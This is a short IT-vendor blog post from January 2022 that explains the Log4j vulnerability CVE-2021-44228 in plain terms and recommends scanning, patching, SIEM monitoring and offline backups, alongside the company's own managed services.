Log4J Cybersecurity Risks

Log4J Overview, Detection, and Mitigation

By John Rudisel | Thursday, January 06, 2022

2 minute read

Executive Summary

Log4j is a very consequential vulnerability, primarily affecting servers and exploited actively. Full scope of vulnerable applications not yet identified and expected to be used for ransomware attacks. AIS recommends deployment of NMS, SIEM, Endpoint Management, and BDR for vulnerability detection and exploitation mitigation.

Background

CVE-2021-44228 is a critical vulnerability in Log4j, an open-source software package used by most Java-based applications for logging audit, debugging, and other data as determined by the application developer. This vulnerability means, if in the course of Log4j logging usual data such as error messages and activity, it encounters a specially-formatted web address, instead of simply writing that to a log file as usual, Log4j will instead download and execute any file at that web address. The combination of widespread use, ease of exploitation, and difficulty of detection makes this perhaps the most severe vulnerability thus far. For example, because Apple iCloud logs the username of every login attempt, simply entering a specially-formatted web address in the username field could cause the server inside Apple processing that login attempt to download and execute malicious code, creating a backdoor inside the network that can be used for data breach and ransomware purposes.

Detection and Mitigation

Continuous scanning
- Identify known and suspected vulnerable assets within the IT environment
- One-time scans no longer sufficient as additional vulnerable applications continue to be identified
- Related Solution - AIS NMS integrates OpenVAS for automated Network Vulnerability Testing
Patch Management
- Update Log4j within 3rd party products to the latest version
- Ensure critical software patches in Windows and other software are applied to reduce lateral movement risk from a compromised system
- Related Solution - AIS Endpoint Management with 3rd party software patching capability
Threat Hunting
- Increase odds of detecting compromised systems before data exfiltration or ransomware deployment with automated review of anomalous activity
- Related Solution – AIS Managed SIEM
Proactive ransomware protection
- Reduce ransomware attack consequences with an air-gapped backup system not accessible to threat actors
- Related Solution – AIS Managed Backup and Disaster Recovery

AIS treats all security issues as critical and recommends deployment of NMS, SIEM, Endpoint Management, and BDR for vulnerability detection and exploitation mitigation. Please reach out to your primary AIS contact person with any questions regarding this vulnerability or solutions for detection and mitigation.

Last modified January 6, 2022

Get Started Now